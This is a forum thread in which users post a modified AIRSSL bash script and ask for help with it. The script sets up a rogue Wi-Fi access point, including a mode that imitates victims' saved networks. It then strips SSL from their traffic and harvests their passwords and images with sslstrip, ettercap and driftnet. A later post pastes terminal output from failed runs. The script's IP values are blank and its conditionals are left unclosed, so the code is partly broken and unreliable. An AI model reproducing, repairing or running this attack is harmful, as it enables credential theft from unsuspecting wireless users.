View Full Version : AirSSL Modified for Kali

2013-10-07, 02:22
Hey guys,

I have most of it working. The problem is it will not dish out IP's to clients trying to connect via FakeAP

1. The directory is /usr/share/wireless/airssl

Anyway, On the code. Here is the script

# (C)opyright 2009 - killadaninja - Modified G60Jon 2010, @jcaitf 2013
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon & @jcaitf "
route -n -A inet | grep UG
echo "Enter the networks gateway IP address, this should be listed above. For example "
read gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read ESSID
airmon-ng start $fakeap_interface

# Dhcpd creation
mkdir -p "/usr/share/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet netmask {
option routers;
option subnet-mask;

option domain-name "\"$ESSID\"";
# option domain-name-servers;
option domain-name-servers;


}" > /usr/share/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "


if [ $ANSWER = "y" ] ; then
airbase-ng --help

if [ $ANSWER = "y" ] ; then
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2

if [ $ANSWER = "a" ] ; then
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2

if [ $ANSWER = "n" ] ; then
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 netmask
ifconfig at0 mtu 1400
route add -net netmask gw
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
#chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/usr/share/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 3

# Ettercap
echo "[+] Configuring ettercap..."
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redifined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1

if [ $ETTER = "n" ] ; then
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1

# Driftnet
echo "[+] Driftnet?"
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/usr/share/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /usr/share/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

echo "[+] Activated..."
echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."


And, Here is the dhcpd.conf


default-lease-time 600;
max-lease-time 7200;

subnet netmask {
option routers;
option subnet-mask;

option domain-name "Free WiFi";
# option domain-name-servers;
option domain-name-servers;



Any help would be great! Thanks in advance

2014-01-16, 06:42
hello.... not working for me.. help... / after creating fake ap
ap dont give internate acess to victim......!!!!!!!
i configured chcp configuration as shown by u.

here is procedure

hello.... not working for me.. help... / after creating fake ap
ap dont give internate acess to victim......!!!!!!!
i configured chcp configuration as shown by u.

here is procedure

root@localhost:~# bash '/root/Desktop/airssl.sh'

AIRSSL 2.0 - Credits killadaninja & G60Jon & @jcaitf UG 0 0 0 ppp0

Enter the networks gateway IP address, this should be listed above. For example
ppp0 no wireless extensions.

wlan0 IEEE 802.11bgn ESSID: off/any
Mode:Ad-Hoc Frequency:2.412 GHz Cell: Not-Associated
Tx-Power=16 dBm
Retry long limit:7 RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off

usbpn0 no wireless extensions.

lo no wireless extensions.

eth0 no wireless extensions.

Enter your interface that is connected to the internet, this should be listed above. For example eth1: ppp0
Enter your interface to be used for the fake AP, for example wlan0: wlan0
Enter the ESSID you would like your rogue AP to be called: hello

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2447 NetworkManager
2551 wpa_supplicant

Interface Chipset Driver

wlan0 Atheros AR9565 ath9k - [phy0]
(monitor mode enabled on mon0)

[+] Configuring FakeAP....

Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?

Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A

Airbase-ng 1.2 beta2 - (C) 2008-2013 Thomas d'Otreppe
Original work: Martin Beck

usage: airbase-ng <options> <replay interface>


-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows other clients to peer)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID
-s : force shared key authentication (default: auto)
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte WEP attack (use if driver can't send frags)
-N : cfrag WEP attack (recommended)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)

Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file

--help : Displays this usage screen

Enter switches, note you have already chosen an ESSID -e this cannot be

[+] Starting FakeAP...
[+] Configuring forwarding tables...
at0: ERROR while getting interface flags: No such device
SIOCSIFADDR: No such device
at0: ERROR while getting interface flags: No such device
SIOCSIFNETMASK: No such device
SIOCSIFMTU: No such device
SIOCADDRT: Network is unreachable
[+] Setting up DHCP...
[+] Starting sslstrip...
[+] Configuring ettercap...

Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N

[+] Starting ettercap...

[+] Driftnet?

Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower),
Y or N
[+] Starting driftnet...

[+] Activated...
Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata

After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR

[+] Cleaning up airssl and resetting iptables...
/root/Desktop/airssl.sh: line 183: kill: (5811) - No such process
/root/Desktop/airssl.sh: line 184: kill: (5870) - No such process
/root/Desktop/airssl.sh: line 186: kill: (5895) - No such process

Interface Chipset Driver

wlan0 Atheros AR9565 ath9k - [phy0]
mon0 Atheros AR9565 ath9k - [phy0] (removed)

Interface Chipset Driver

wlan0 Atheros AR9565 ath9k - [phy0]
(monitor mode disabled)

[+] Clean up successful...
[+] Thank you for using airssl, Good Bye...
root@localhost:~# bash '/root/Desktop/airssl.sh'

AIRSSL 2.0 - Credits killadaninja & G60Jon & @jcaitf UG 0 0 0 ppp0

Enter the networks gateway IP address, this should be listed above. For example
ppp0 no wireless extensions.

wlan0 IEEE 802.11bgn ESSID: off/any
Mode:Managed Access Point: Not-Associated Tx-Power=16 dBm
Retry long limit:7 RTS thr: off Fragment thr: off
Encryption key: off
Power Management: off

usbpn0 no wireless extensions.

lo no wireless extensions.

eth0 no wireless extensions.

Enter your interface that is connected to the internet, this should be listed above. For example eth1: ppp0
Enter your interface to be used for the fake AP, for example wlan0: wlan0
Enter the ESSID you would like your rogue AP to be called: hello

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2447 NetworkManager
2551 wpa_supplicant

Interface Chipset Driver

wlan0 Atheros AR9565 ath9k - [phy0]
(monitor mode enabled on mon0)

[+] Configuring FakeAP....

Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?

Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your choosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A

[+] Starting FakeAP...
[+] Configuring forwarding tables...
[+] Setting up DHCP...
[+] Starting sslstrip...
[+] Configuring ettercap...

Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N

[+] Starting ettercap...

[+] Driftnet?

Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower),
Y or N

[+] Activated...
Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata

After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR